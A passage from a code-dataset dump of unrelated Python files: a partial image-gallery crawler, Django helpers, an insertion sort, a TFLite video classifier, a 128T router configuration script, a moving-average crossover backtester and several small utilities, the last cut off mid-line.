新建套图文件夹并切换到该目录下\n \"\"\"\n path = os.path.join(DIR_PATH, folder_name)\n # 如果目录已经存在就不用再次爬取了,去重,提高效率。存在返回 False,否则反之\n if not os.path.exists(path):\n os.makedirs(path)\n print(path)\n os.chdir(path)\n return True\n print(\"Folder has existed!\")\n return False\n\n\ndef delete_empty_dir(save_dir):\n \"\"\"\n 如果程序半路中断的话,可能存在已经新建好文件夹但是仍没有下载的图片的\n 情况但此时文件夹已经存在所以会忽略该套图的下载,此时要删除空文件夹\n \"\"\"\n if os.path.exists(save_dir):\n if os.path.isdir(save_dir):\n for d in os.listdir(save_dir):\n path = os.path.join(save_dir, d) # 组装下一级地址\n if os.path.isdir(path):\n delete_empty_dir(path) # 递归删除空文件夹\n if not os.listdir(save_dir):\n os.rmdir(save_dir)\n print(\"remove the empty dir: {}\".format(save_dir))\n else:\n print(\"Please start your performance!\") # 请开始你的表演\n\n\nlock = threading.Lock() # 全局资源锁\n\n\ndef urls_crawler(url):\n \"\"\"\n 爬虫入口,主要爬取操作\n \"\"\"\n try:\n r = requests.get(url, headers=HEADERS, timeout=60).text\n # 套图名,也作为文件夹名\n folder_name = BeautifulSoup(r, 'lxml').find(\n 'h2').text.encode('ISO-8859-1').decode('utf-8')\n\n with lock:\n m = hashlib.md5(folder_name.encode(encoding='utf-8'))\n 
filename = m.hexdigest()[8:-8]\n if make_dir(filename):\n # 套图张数\n max_count = BeautifulSoup(r, 'lxml').find(\n 'div', class_='page').find_all('a')[-2].get_text()\n # 套图页面\n page_urls = [url + \"/\" + str(i) for i in\n range(1, int(max_count) + 1)]\n # 图片地址\n img_urls = []\n for index, page_url in enumerate(page_urls):\n result = requests.get(\n page_url, headers=HEADERS, timeout=60).text\n # 最后一张图片没有a标签直接就是img所以分开解析\n if index + 1 < len(page_urls):\n img_url = BeautifulSoup(result, 'lxml').find(\n 'div', class_='content').find('a').img['src']\n img_urls.append(img_url)\n else:\n img_url = BeautifulSoup(result, 'lxml').find(\n 'div', class_='content').find('img')['src']\n img_urls.append(img_url)\n\n for cnt, url in enumerate(img_urls):\n save_pic(url, cnt)\n\n print(len(img_urls))\n aItem = {}\n aItem[\"filename\"] = filename\n aItem[\"source\"] = \"mzitu\"\n aItem[\"title\"] = quote(folder_name, 'utf-8')\n aItem[\"typename\"] = folder_name\n aItem[\"imgsize\"] = len(img_urls)\n requests.post(reques_url, aItem, timeout=60).text\n except Exception as e:\n print(e)\n\n\nif __name__ == \"__main__\":\n urls = ['http://mmjpg.com/mm/{cnt}'.format(cnt=cnt)\n for cnt in range(1, 953)]\n pool = Pool(processes=cpu_count()+10)\n try:\n delete_empty_dir(DIR_PATH)\n pool.map(urls_crawler, urls)\n except Exception:\n time.sleep(30)\n delete_empty_dir(DIR_PATH)\n pool.map(urls_crawler, urls)\n","sub_path":"mm_crawler.py","file_name":"mm_crawler.py","file_ext":"py","file_size_in_byte":5933,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"} +{"seq_id":"468548705","text":"# -*- coding: utf-8 -*-\nimport os\n\nimport inspect\nfrom django import template\nfrom django.core.exceptions import ObjectDoesNotExist\nfrom .middlewares.ThreadLocal import get_current_request\n\n\ndef process_template_args(rawparams, context = None):\n\targs = []\n\tfor param in rawparams:\n\t\tpos = param.find('=')\n\t\tif (pos > 0):\n\t\t\tbreak\n\t\tif context is not None:\n\t\t\tparam = template.resolve_variable(param, context)\n\t\targs.append(param)\n\treturn args\n\n\ndef process_template_kwargs(rawparams, context = None):\n\tkwargs = {}\n\tfor param in rawparams:\n\t\tparamname = param\n\t\tparamvalue = ''\n\t\tpos = param.find('=')\n\t\tif (pos <= 0):\n\t\t\tcontinue\n\t\tparamname = param[:pos]\n\t\tparamvalue = param[pos + 1:]\n\t\tif context is not None:\n\t\t\tparamvalue = template.resolve_variable(paramvalue, context)\n\t\tkwargs[paramname] = paramvalue\n\treturn kwargs\n\n\ndef iterify(items):\n\ttry:\n\t\titer(items)\n\t\treturn items\n\texcept TypeError:\n\t\treturn [items]\n\n\ndef build_absolute_uri(path):\n\trequest = get_current_request()\n\tif request:\n\t\treturn request.build_absolute_uri(path)\n\telse:\n\t\tfrom django.conf import settings\n\t\tfrom django.contrib.sites.models import Site\n\t\treturn 'http://' + Site.objects.get(pk = settings.SITE_ID) + path\n\n\ndef clean_dir(path, root_path):\n\tpath = os.path.abspath(path)\n\troot_path = os.path.abspath(root_path)\n\n\tcurrent_dir = path\n\twhile len(os.path.split(current_dir)) and current_dir.startswith(root_path) and current_dir != root_path:\n\t\ttry:\n\t\t\tos.rmdir(current_dir)\n\t\texcept OSError:\n\t\t\treturn\n\t\tcurrent_dir = os.path.join(*os.path.split(current_dir)[:-1])\n\n\ndef get_meta(instance):\n\treturn getattr(instance, \"_meta\")\n\n\ndef get_default_manager(obj):\n\tif inspect.isclass(obj):\n\t\treturn getattr(obj, \"_default_manager\")\n\telse:\n\t\treturn getattr(obj.__class__, 
\"_default_manager\")\n\n\ndef reload_model(obj):\n\treturn get_default_manager(obj.__class__).get(pk=obj.pk)\n\n\n#def monkey_patch_safestring():\n#\tfrom django.utils.safestring import SafeData\n#\tSafeData.__html__ = lambda self: self\n#\n#\tfrom jinja2 import escape\n#\tfrom django.forms import BaseForm, Media\n#\tfrom django.forms.forms import BoundField\n#\tfrom django.forms.formsets import BaseFormSet\n#\tfrom django.forms.utils import ErrorDict, ErrorList\n#\n#\tfor cls in (BaseForm, Media, BoundField, BaseFormSet, ErrorDict, ErrorList):\n#\t\tcls.__html__ = lambda self: escape(unicode(self))\n#\n#\n#monkey_patch_safestring()\n#\n#\n#def monkey_patch_jinja2_getattr():\n#\tfrom jinja2.environment import Environment\n#\n#\tdef env_getattr(self, obj, attribute):\n#\t\ttry:\n#\t\t\treturn Environment.old_getattr(self, obj, attribute)\n#\t\texcept ObjectDoesNotExist as exc:\n#\t\t\treturn self.undefined(obj=obj, name=attribute, hint=unicode(exc))\n#\n#\tdef env_getitem(self, obj, attribute):\n#\t\ttry:\n#\t\t\treturn Environment.old_getitem(self, obj, attribute)\n#\t\texcept ObjectDoesNotExist as exc:\n#\t\t\treturn self.undefined(obj=obj, name=attribute, hint=unicode(exc))\n#\n#\tEnvironment.old_getattr = Environment.getattr\n#\tEnvironment.old_getitem = Environment.getitem\n#\tEnvironment.getattr = env_getattr\n#\tEnvironment.getitem = env_getitem\n#\n#\n#monkey_patch_jinja2_getattr()\n","sub_path":"common_utils/__init__.py","file_name":"__init__.py","file_ext":"py","file_size_in_byte":3077,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"} +{"seq_id":"38731853","text":"class InsertionSort(object):\n @staticmethod\n def find_insert_index(data, item):\n i = 0\n\n while ((i < len(data)) and \n (item > data[i])):\n i += 1\n\n return i\n\n @staticmethod\n def insert(data, item):\n \"\"\"Inserts item in ordered list, preserving order.\"\"\"\n idxToPlace = InsertionSort.find_insert_index(data, item)\n\n # grow data by 1 element\n data.append(0)\n\n i = len(data) - 1\n\n while (i > idxToPlace):\n data[i] = data[i - 1]\n i -= 1\n\n data[idxToPlace] = item\n\n\n @staticmethod\n def sort(data):\n newData = []\n\n # start w/ the first element going into newData\n newData.append(data[0])\n\n # look at each item in data\n # place at correct location in newData\n # bumping elements up as needed\n for dataIdx in range(1, len(data)):\n valToInsert = data[dataIdx]\n\n InsertionSort.insert(newData, valToInsert)\n\n return newData","sub_path":"InsertionSort/insertionSort.py","file_name":"insertionSort.py","file_ext":"py","file_size_in_byte":1022,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"} +{"seq_id":"315016502","text":"import numpy as np\nimport cv2\n\nimport matplotlib.pylab as plt\nimport argparse\nimport io\nimport os\nimport sys\nimport time\n\nimport picamera\nfrom picamera.array import PiRGBArray\nfrom picamera import PiCamera\n\nfrom PIL import Image\nfrom tflite_runtime.interpreter import Interpreter\n\n# devuelve un diccionario con todas las clases\ndef load_labels(path):\n with open(path, 'r') as f:\n return {i: line.strip() for i, line in enumerate(f.readlines())}\n\n\ndef clasificar_imagen(interpreter,imagen,top_k=1):\n \n input_details = interpreter.get_input_details()\n output_details = interpreter.get_output_details()\n \n input_shape = input_details[0]['shape']\n input_data = np.array(imagen, dtype=np.float32)\n interpreter.set_tensor(input_details[0]['index'], input_data)\n \n 
interpreter.invoke()\n\n output = np.squeeze(interpreter.get_tensor(output_details[0]['index']))\n \n ordered = np.argpartition(-output, top_k)\n return [(i, output[i]) for i in ordered[:top_k]]\n \n\ndef main():\n \n # de aqui para asignar la ruta del modelo desde la terminal\n parser = argparse.ArgumentParser(\n formatter_class=argparse.ArgumentDefaultsHelpFormatter)\n parser.add_argument(\n '--model', help='File path of .tflite file.', required=True)\n parser.add_argument(\n '--labels', help='File path of labels file.', required=True)\n args = parser.parse_args()\n \n \n #pathLabels=('/home/pi/Documents/labels.txt') \n #pathTflite=('/home/pi/Documents/RaspberryLite/Proyecto Final/Classifier_best_val_accuracy.tflite')\n \n labels = load_labels(args.labels)\n \n \n interpreter = Interpreter(args.model)\n interpreter.allocate_tensors()\n \n camera = PiCamera()\n camera.resolution = (640, 480)\n camera.framerate = 30\n rawCapture = PiRGBArray(camera, size=(640, 480)) \n \n \n captura = cv2.VideoCapture('/home/pi/Documents/WhatsApp Video 2020-10-26 at 8.40.23 AM.mp4')\n\n while (captura.isOpened()):\n \n ret, imagen = captura.read()\n\n if ret == True:\n \n\n frame=cv2.cvtColor(imagen, cv2.COLOR_BGR2RGB)\n \n \n \n Imagen_normed = frame/ 255\n \n \n Imagen_show = cv2.resize(imagen, (600, 600))\n \n Imagen_resized = cv2.resize(Imagen_normed, (224, 224))\n Imagen_espnaded=np.expand_dims(Imagen_resized, axis=0)\n \n \n start_time = time.time()\n \n results = clasificar_imagen(interpreter, Imagen_espnaded)\n\n elapsed_ms = round((time.time() - start_time) * 1000,2)\n\n label_id, prob = results[0]\n \n print(labels[label_id]+\" \"+str(elapsed_ms)) \n font = cv2.FONT_HERSHEY_SIMPLEX\n color=(14,129,60)\n images = cv2.putText(Imagen_show,str(elapsed_ms)+\"ms \"+labels[label_id]+\" \"+str(prob) , (00,100), font, 1,color,2, cv2.LINE_AA) \n \n\n cv2.imshow(\"Frame\", images)\n \n \n # salir si se preciona q \n if cv2.waitKey(1) & 0xFF == ord('q'):\n break\n \n \n cv2.destroyAllWindows()\n \nif __name__ == '__main__':\n main()","sub_path":"tfliteDemoVideo.py","file_name":"tfliteDemoVideo.py","file_ext":"py","file_size_in_byte":3194,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"} +{"seq_id":"136728614","text":"#!/usr/bin/env python3\n\nimport argparse\nimport os\nimport requests\nimport sys\n\nfrom requests.packages.urllib3.exceptions import InsecureRequestWarning\nrequests.packages.urllib3.disable_warnings(InsecureRequestWarning)\n\n\nclass UnauthorizedException(Exception):\n pass\n\n\nclass RestGraphqlApi(object):\n \"\"\"Representation of REST connection.\"\"\"\n\n token = None\n authorized = False\n\n def __init__(self, host='localhost', verify=False, user='admin', password=None):\n self.host = host\n self.verify = verify\n self.user = user\n self.password = password\n\n def get(self, location, authorization_required=True):\n \"\"\"Get data per REST API.\"\"\"\n url = 'https://{}/api/v1/{}'.format(self.host, location.strip('/'))\n headers = {\n 'Content-Type': 'application/json',\n }\n if authorization_required:\n if not self.authorized:\n self.login()\n if self.token:\n headers['Authorization'] = 'Bearer {}'.format(self.token)\n request = requests.get(\n url, headers=headers,\n verify=self.verify)\n return request\n\n def post(self, location, json, authorization_required=True):\n \"\"\"Send data per REST API via post.\"\"\"\n url = 'https://{}/api/v1/{}'.format(self.host, location.strip('/'))\n headers = {\n 'Content-Type': 'application/json',\n }\n # 
Login if not yet done\n if authorization_required:\n if not self.authorized:\n self.login()\n if self.token:\n headers['Authorization'] = 'Bearer {}'.format(self.token)\n request = requests.post(\n url, headers=headers, json=json,\n verify=self.verify)\n return request\n\n def patch(self, location, json, authorization_required=True):\n \"\"\"Send data per REST API via patch.\"\"\"\n url = 'https://{}/api/v1/{}'.format(self.host, location.strip('/'))\n headers = {\n 'Content-Type': 'application/json',\n }\n # Login if not yet done\n if authorization_required:\n if not self.authorized:\n self.login()\n if self.token:\n headers['Authorization'] = 'Bearer {}'.format(self.token)\n request = requests.patch(\n url, headers=headers, json=json,\n verify=self.verify)\n return request\n\n def login(self):\n json = {\n 'username': self.user,\n }\n if self.password:\n json['password'] = self.password\n else:\n key_file = 'pdc_ssh_key'\n if not os.path.isfile(key_file):\n key_file = '/home/admin/.ssh/pdc_ssh_key'\n\n key_content = ''\n with open(key_file) as fd:\n key_content = fd.read()\n json['local'] = key_content\n request = self.post('/login', json, authorization_required=False)\n if request.status_code == 200:\n self.token = request.json()['token']\n self.authorized = True\n else:\n message = request.json()['message']\n raise UnauthorizedException(message)\n\n def get_routers(self):\n return self.get('/router').json()\n\n def get_nodes(self, router_name):\n return self.get('/config/running/authority/router/{}/node'.format(\n router_name)).json()\n\n def has_uncommitted_changes(self):\n \"\"\"Return whether conductor's candidate config differs from running.\"\"\"\n request = self.get('/config/version?datastore=candidate')\n if request.status_code != 200:\n fatal('Cannot connect to REST API.')\n return request.json()['isDirty']\n\n\ndef log(*messages):\n \"\"\"Write messages to log file.\"\"\"\n print(*messages)\n\ndef fatal(*messages):\n \"\"\"Show error message and quit.\"\"\"\n log('FATAL:', *messages)\n sys.exit(1)\n\ndef info(*messages):\n \"\"\"Show error message and quit.\"\"\"\n log('INFO:', *messages)\n\ndef warning(*messages):\n \"\"\"Show error message and quit.\"\"\"\n log('WARNING:', *messages)\n\n\ndef parse_arguments():\n \"\"\"Get commandline arguments.\"\"\"\n parser = argparse.ArgumentParser(\n description='Configure selected options of 128T routers')\n parser.add_argument('--router', '-r', help='Router name', required=True)\n parser.add_argument('--commit', '-c', help='Commit config',\n action='store_true')\n parser.add_argument('--yes', help='Commit unconfirmed', action='store_true')\n parser.add_argument('--asset-id', '-a', help='Change asset id')\n parser.add_argument('--enable-asset-resilency', action='store_true')\n parser.add_argument('--enable-maintenance-mode', action='store_true')\n parser.add_argument('--disable-maintenance-mode', action='store_true')\n # for remote conductor (e.g. 
testing purposes)\n parser.add_argument('--host', help='Conductor hostname')\n parser.add_argument('--user', help='Conductor username (if not localhost)')\n parser.add_argument('--password', help='Conductor password (if not localhost)')\n return parser.parse_args()\n\n\ndef get_config(api, locations, router_name, node_name):\n config = {}\n for dict_key, tup in locations.items():\n location = tup[0].format(router=router_name, node=node_name)\n key = tup[1]\n config[dict_key] = api.get('/config/running' + location).json()[key]\n return config\n\ndef update_config(api, locations, router_name, node_name, changes):\n for dict_key, new_value in changes.items():\n tup = locations[dict_key]\n location = tup[0].format(router=router_name, node=node_name)\n key = tup[1]\n api.patch('/config/candidate' + location, {key: new_value})\n\n\ndef show_changes(router_name, current_config, new_config, commit):\n if current_config == new_config:\n info('Nothing has changed.')\n return {}\n\n if commit:\n mode = 'committed'\n else:\n mode = 'applied to candidate config'\n print('The following changes for router {} will be {}:'.format(\n router_name, mode))\n changes = {}\n for key, value in current_config.items():\n new_value = new_config[key]\n if new_value != value:\n changes[key] = new_value\n print('{}: {} => {}'.format(key, value, new_value))\n return changes\n\n\ndef main():\n args = parse_arguments()\n params = {}\n if args.host:\n params['host'] = args.host\n if args.user and args.password:\n params['user'] = args.user\n params['password'] = args.password\n api = RestGraphqlApi(**params)\n\n if api.has_uncommitted_changes():\n fatal('Conductor has uncommitted changes.',\n 'Quit here to avoid commit conflicts.')\n\n router_name = args.router\n routers = [r['name'] for r in api.get_routers()]\n if router_name not in routers:\n fatal('Specified router in unknown on conductor:', router_name)\n\n nodes = api.get_nodes(router_name)\n num_nodes = len(nodes)\n if num_nodes != 1:\n fatal('This script supports only routers with one node.',\n num_nodes,'found.')\n node_name = nodes[0]['name']\n locations = {\n 'maintenance-mode': ('/authority/router/{router}', 'maintenance-mode'),\n 'asset-connection-resiliency': ('/authority/router/{router}/system/asset-connection-resiliency', 'enabled'),\n 'asset-id': ('/authority/router/{router}/node/{node}', 'asset-id'),\n }\n\n current_config = get_config(api, locations, router_name, node_name)\n new_config = current_config.copy()\n\n if args.asset_id:\n new_config['asset-id'] = args.asset_id\n if args.enable_asset_resilency:\n new_config['asset-connection-resiliency'] = 'true'\n if args.enable_maintenance_mode:\n new_config['maintenance-mode'] = True\n if args.disable_maintenance_mode:\n new_config['maintenance-mode'] = False\n\n changes = show_changes(router_name, current_config, new_config, args.commit)\n if not changes:\n return\n\n if not args.yes:\n answer = input('Please confirm (y/n): ')\n if answer.lower() not in ('y', 'yes'):\n return\n\n update_config(api, locations, router_name, node_name, changes)\n if args.commit:\n api.post('/config/commit', {})\n info('Changes from candidate to running config have been committed.')\n else:\n warning('No --commit argument given. 
Candidate config has been updated, but NOT committed!')\n\n\nif __name__ == '__main__':\n    main()\n","sub_path":"files/t128-configure-router.py","file_name":"t128-configure-router.py","file_ext":"py","file_size_in_byte":8528,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"51"}
+{"seq_id":"465030938","text":"from numbers import Number\nimport pandas as pd\nimport abc\nimport numpy as np\nfrom typing import Callable\nfrom utils import read_file, assert_msg, crossover, SMA\n\n\nclass Strategy(metaclass=abc.ABCMeta):\n    \"\"\"\n    Abstract strategy class, used to define trading strategies.\n\n    To define your own strategy class, inherit from this base class and\n    implement the two abstract methods:\n    Strategy.init\n    Strategy.next\n    \"\"\"\n\n    def __init__(self, broker, data):\n        \"\"\"\n        Construct the strategy object.\n\n        @params broker: ExchangeAPI  trading API interface, used for simulated trading\n        @params data:   list         market quote data\n        \"\"\"\n        self._indicators = []\n        self._broker = broker  # type: _Broker\n        self._data = data  # type: _Data\n        self._tick = 0\n\n    def I(self, func: Callable, *args) -> np.ndarray:\n        \"\"\"\n        Compute a buy/sell indicator vector. An indicator vector is an array whose\n        length matches the historical data; it is used to decide whether to \"buy\"\n        or \"sell\" at a given point in time.\n\n        For example, to compute a moving average:\n        def init():\n            self.sma = self.I(utils.SMA, self.data.Close, N)\n        \"\"\"\n        value = func(*args)\n        value = np.asarray(value)\n        assert_msg(value.shape[-1] == len(self._data.Close), 'The indicator length must match the data length')\n\n        self._indicators.append(value)\n        return value\n\n    @property\n    def tick(self):\n        return self._tick\n\n    @abc.abstractmethod\n    def init(self):\n        \"\"\"\n        Initialize the strategy. Called once during backtesting/execution to\n        initialize the internal state of the strategy.\n        Auxiliary strategy parameters can also be precomputed here, e.g. from the\n        historical quote data:\n        compute the buy/sell indicator vectors;\n        train a model / initialize model parameters\n        \"\"\"\n        pass\n\n    @abc.abstractmethod\n    def next(self, tick):\n        \"\"\"\n        Step function, executes the strategy at step `tick`. `tick` represents the\n        current \"time\"; e.g. data[tick] accesses the current market price.\n        \"\"\"\n        pass\n\n    def buy(self):\n        self._broker.buy()\n\n    def sell(self):\n        self._broker.sell()\n\n    @property\n    def data(self):\n        return self._data\n\n\nclass SmaCross(Strategy):\n    # window size of the small SMA, used to compute the fast SMA line\n    fast = 10\n\n    # window size of the large SMA, used to compute the slow SMA line\n    slow = 20\n\n    def init(self):\n        # compute the fast and slow lines for every point in history\n        self.sma1 = self.I(SMA, self.data.Close, self.fast)\n        self.sma2 = self.I(SMA, self.data.Close, self.slow)\n\n    def next(self, tick):\n        # if the fast line has just crossed above the slow line, buy with all cash\n        if crossover(self.sma1[:tick], self.sma2[:tick]):\n            self.buy()\n\n        # if the slow line has just crossed above the fast line, sell everything\n        elif crossover(self.sma2[:tick], self.sma1[:tick]):\n            self.sell()\n\n        # otherwise, take no action at this point in time.\n        else:\n            pass\n\n\nclass ExchangeAPI:\n    def __init__(self, data, cash, commission):\n        assert_msg(0 < cash, \"The initial cash amount must be greater than 0; cash given: {}\".format(cash))\n        assert_msg(0 <= commission <= 0.05, \"A reasonable commission rate usually does not exceed 5%; rate given: {}\".format(commission))\n        self._initial_cash = cash\n        self._data = data\n        self._commission = commission\n        self._position = 0\n        self._cash = cash\n        self._i = 0\n\n    @property\n    def cash(self):\n        \"\"\"\n        :return: the current amount of cash in the account\n        \"\"\"\n        return self._cash\n\n    @property\n    def position(self):\n        \"\"\"\n        :return: the current position of the account\n        \"\"\"\n        return self._position\n\n    @property\n    def initial_cash(self):\n        \"\"\"\n        :return: the initial cash amount\n        \"\"\"\n        return self._initial_cash\n\n    @property\n    def market_value(self):\n        \"\"\"\n        :return: the current market value\n        \"\"\"\n        return self._cash + self._position * self.current_price\n\n    @property\n    def current_price(self):\n        \"\"\"\n        :return: the current market price\n        \"\"\"\n        return self._data.Close[self._i]\n\n    def buy(self):\n        \"\"\"\n        Buy at the market price with all remaining cash in the account.\n        Amount bought = invested cash * (1.0 - commission) / price\n        \"\"\"\n        self._position = float(self._cash / (self.current_price * (1 + self._commission)))\n        self._cash = 0.0\n\n    def sell(self):\n        \"\"\"\n        Sell the remaining position of the account.\n        Sale proceeds = amount held * price * (1.0 - commission)\n        \"\"\"\n        self._cash += float(self._position * self.current_price * (1 - self._commission))\n        self._position = 0.0\n\n    def next(self, tick):\n        self._i = tick\n\n\nclass Backtest:\n    \"\"\"\n    Backtest class, used to read historical quote data, execute a strategy,\n    simulate the trades and estimate the return.\n    \"\"\"\n\n    def __init__(self,\n                 data: pd.DataFrame,\n                 strategy_type: type(Strategy),\n                 broker_type: type(ExchangeAPI),\n                 cash: float = 10000,\n                 commission: float = .0):\n        \"\"\"\n        Construct the backtest object. Required parameters: historical data,\n        strategy object, initial cash amount, commission rate.\n        Initialization checks the input types and fills empty values in the data.\n        :param data:            pd.DataFrame       historical OHLC data as a pandas DataFrame\n        :param strategy_type:   type(Strategy)     strategy type\n        :param broker_type:     type(ExchangeAPI)  exchange API type, responsible for executing buy/sell operations\n        :param cash:            float              initial cash amount\n        :param commission:      float              commission per trade\n        \"\"\"\n        assert_msg(issubclass(strategy_type, Strategy), \"strategy_type is not a Strategy type\")\n        assert_msg(issubclass(broker_type, ExchangeAPI), \"broker_type is not an ExchangeAPI type\")\n        assert_msg(isinstance(commission, Number), \"commission is not a numeric value\")\n\n        data = data.copy(False)\n\n        # if there is no Volume column, fill it with NaN\n        if 'Volume' not in data:\n            data['Volume'] = np.nan\n\n        # validate the OHLC data format\n        assert_msg(len(data.columns & {'Open', 'High', 'Low', 'Close', 'Volume'}) == 5,\n                   (\"The `data` format is invalid; at least these columns are required: \"\n                    \"'Open', 'High', 'Low', 'Close'\"))\n\n        # check for missing values\n        assert_msg(not data[['Open', 'High', 'Low', 'Close']].max().isnull().any(),\n                   ('Some OHLC values are missing; drop those rows or fill them in by interpolation. '))\n\n        # if the quote data is not sorted by time, re-sort it\n        if not data.index.is_monotonic_increasing:\n            data = data.sort_index()\n\n        # use the data to initialize the exchange object and the strategy object\n        self._data = data\n        self._broker = broker_type(data, cash, commission)\n        self._strategy = strategy_type(self._broker, self._data)\n        self._results = None\n\n    def run(self):\n        \"\"\"\n        Run the backtest: iterate over the historical data, execute the simulated\n        trades and return the backtest results.\n        :return:\n        \"\"\"\n        strategy = self._strategy\n        broker = self._broker\n\n        # initialize the strategy\n        strategy.init()\n\n        # set the start and end positions of the backtest\n        start = 100\n        end = len(self._data)\n\n        # main backtest loop: update the market state, then execute the strategy\n        for i in range(start, end):\n            # note: move the market state to tick i first, then execute the strategy\n            broker.next(i)\n            strategy.next(i)\n\n        # after the strategy run has finished, compute the results and return them\n        self._results = self._compute_result(broker)\n        return self._results\n\n    def _compute_result(self, broker):\n        s = pd.Series()\n        s['initial market value'] = broker.initial_cash\n        s['final market value'] = broker.market_value\n        s['profit'] = broker.market_value - broker.initial_cash\n        return s\n\n\ndef main():\n    BTCUSD = read_file(\"BTCUSD_GEMINI.csv\")\n    ret = Backtest(BTCUSD, SmaCross, ExchangeAPI, 10000.0, 0.000).run()\n    print(BTCUSD.head())\n\n\nif __name__ == '__main__':\n    main()\n","sub_path":"py_core/assets/04-practice/03/code/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":8244,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"}
+{"seq_id":"623921849","text":"# 19.In Orange County, 51% of the adults are males. (It doesn't take too much advanced mathematics to deduce that the other\n# 49% are females.) One adult is randomly selected for a survey involving credit card usage. a. Find the prior probability\n# that the selected person is a male. b. It is later learned that the selected survey subject was smoking a cigar. Also, 9.5%\n# of males smoke cigars, whereas 1.7% of females smoke cigars (based on data from the Substance Abuse and Mental Health Services\n# Administration). 
Use this additional information to find the probability that the selected subject is a male.\n\n\ndef probability_male_given_smoker(value1, value2, value3,value4):\n    probability = (value1 * value2) / (value1 * value2 + value3 * value4)\n    return probability\n\n\np_male = 0.51\np_female = 0.49\np_smoker_given_male = 9.5/100\np_smoker_given_female = 1.7/100\nprint(probability_male_given_smoker(p_male,p_smoker_given_male,p_female,p_smoker_given_female))","sub_path":"Probability/Probability_19.py","file_name":"Probability_19.py","file_ext":"py","file_size_in_byte":982,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"}
+{"seq_id":"185084140","text":"# TIO_CH22_3.py\n# Copyright Warren & Carter Sande, 2013\n# Released under MIT license http://www.opensource.org/licenses/mit-license.php\n# Version $version ----------------------------\n\n# Answer to practice exercise 3 from chapter 22.\n\n# Save data to a file using the pickle module\n\nimport pickle\n\nimie = raw_input(\"Podaj swoje imię: \")\nwiek = raw_input(\"Podaj swój wiek: \")\nkolor = raw_input(\"Podaj swój ulubiony kolor: \")\npotrawa = raw_input(\"Podaj swoją ulubioną potrawę: \")\n\nmoja_lista = [imie, wiek, kolor, potrawa]\n\nplik = open(\"moj_plik.pkl\", 'w')\npickle.dump(moja_lista, plik)\n\nplik.close()\n\n","sub_path":"przyklady/przyklady/Odpowiedzi/TIO_CH22_3.py","file_name":"TIO_CH22_3.py","file_ext":"py","file_size_in_byte":622,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"}
+{"seq_id":"396215093","text":"import pymongo\n\nclass Sort:\n    def __init__(self,order=None):\n        self.order = order\n\n        self.m = {\n            'ASC': pymongo.ASCENDING,\n            'DESC': pymongo.DESCENDING\n        }\n\n    def sort(self):\n        if not self.order:\n            return None\n\n        d = []\n        for o in self.order:\n            name,value = o['name'],o['type']\n            d.append((name,self.m[value]))\n        return d\n\n","sub_path":"msql/sort.py","file_name":"sort.py","file_ext":"py","file_size_in_byte":420,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"}
+{"seq_id":"400795609","text":"# -*- encoding:utf-8 -*-\nfrom django.conf.urls import patterns\nfrom django.conf.urls import url\n\nimport views\n\n# URL dispatcher (see the Django documentation for details)\nurlpatterns = patterns('',\n    url(r'^$', views.IndexView.as_view(), name='index'),\n    url(r'^create/$', views.CreateView.as_view(), name='create'),\n    url(r'^(?P<pk>[^/]+)/$',\n        views.DetailView.as_view(), name='detail'),\n    url(r'^(?P<pk>[^/]+)/delete/$', views.DeleteView.as_view(), name='delete'),\n)\n","sub_path":"dashboards/drillingsystem/router_manager/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":509,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"}
+{"seq_id":"576561109","text":"import cv2\r\nimport numpy as np\r\nfrom colour_demosaicing import demosaicing_CFA_Bayer_Menon2007\r\nimport os\r\nfrom tqdm import tqdm\r\nimport time\r\n\r\n# histogram\r\n# pnm_file = ''\r\n# pnm = cv2.imread(pnm_file)\r\n# eq = cv2.equalizeHist(pnm)\r\n\r\n# # convert to 3 channel\r\n# cv2.imwrite('root/wangxin/eq.jpg',demosaicing_CFA_Bayer_Menon2007(eq))\r\n\r\nnames = {}\r\nsave_folder = '/root/wangxin/test/'\r\nwith open('test_dataset.csv', 'r') as f:\r\n    r = f.readlines()\r\n    for line in r:\r\n        line = line.split(',')[0]\r\n        path = line.split('/')\r\n        folder = path[0].split('_')\r\n        folder = '_'.join(folder[:-1]) + '/' + folder[-1]\r\n        name = folder + '/' + path[-1].split('.')[0] + '.pnm'\r\n        
names[name] = 1\r\nn = []\r\nfor key in names:\r\n\tn.append(key)\r\nnames = n\r\nprint(len(names))\r\n#print(names)\r\nnum = 1\r\nt1 = time.time()\r\nfor epoch in tqdm(range(int(len(names)/num))):\r\n\r\n\tpnms = np.zeros([2048,2448*num])\r\n\tfor index,name in enumerate(names[epoch*num:(epoch+1)*num]):\r\n\t\tpnm_file = name\r\n\t\tpnm = cv2.imread('/dataset/training/'+pnm_file,0)\r\n\t\teq = cv2.equalizeHist(pnm)\r\n\t\t#print(pnm.shape)\r\n\t\tpnms[:,index*2448:(index+1)*2448] = eq\r\n\t#print('read over')\r\n\r\n\t#print('eq over')\r\n\tpnms_3 = demosaicing_CFA_Bayer_Menon2007(pnms)\r\n\t#print('demosaicing_CFA_Bayer_Menon2007 over')\r\n\t#print('write')\r\n\tfor index,name in enumerate(names[epoch*num:(epoch+1)*num]):\r\n\t\t#print(pnms_3[:,index*2448:index*2448+2448,:].shape)\r\n\t\timage = pnms_3[:,index*2448:index*2448+2448,:] \r\n\t\t#print(image.shape)\r\n\t\tif not os.path.exists(save_folder+'/'.join(name.split('/')[:-1])):\r\n\t\t\tos.mkdir(save_folder+'/'.join(name.split('/')[:-2]))\r\n\t\t\tos.mkdir(save_folder+'/'.join(name.split('/')[:-1]))\r\n\t\tcv2.imwrite(save_folder +'.'.join(name.split('.')[:-1])+'.jpg',image)\r\n\t\t#print(index/num)\r\npnms = np.zeros([2048,2448*num])\r\nfor index,name in enumerate(names[(epoch+1)*num:]):\r\n\tpnm_file = name\r\n\tpnm = 